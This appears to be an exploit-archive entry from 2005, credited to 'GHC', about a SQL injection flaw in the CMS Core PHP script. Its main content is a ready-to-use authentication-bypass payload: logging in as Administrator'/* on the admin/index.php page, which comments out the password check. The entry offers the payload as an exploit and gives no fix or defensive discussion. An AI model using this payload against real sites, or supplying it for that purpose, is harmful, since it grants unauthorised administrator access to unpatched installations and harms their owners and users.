id: 66
date: 02/10/2005
title: CMScore SQL Injection Exploit
author: GHC
cves: 

=============================
CMScore SQL Injection Exploit
=============================



/*==========================================*/
// GHC -> CMS CORE <- ADVISORY
// Product: CMS Core
// URL: http://chipmunk-scripts.com/scripts/cmscore.php
// VULNERABILITY CLASS: SQL injection
/*==========================================*/

[exploit]
Log in with username
Administrator'/*
from admin/index.php page.



#  0day.today [2023-03-23]  #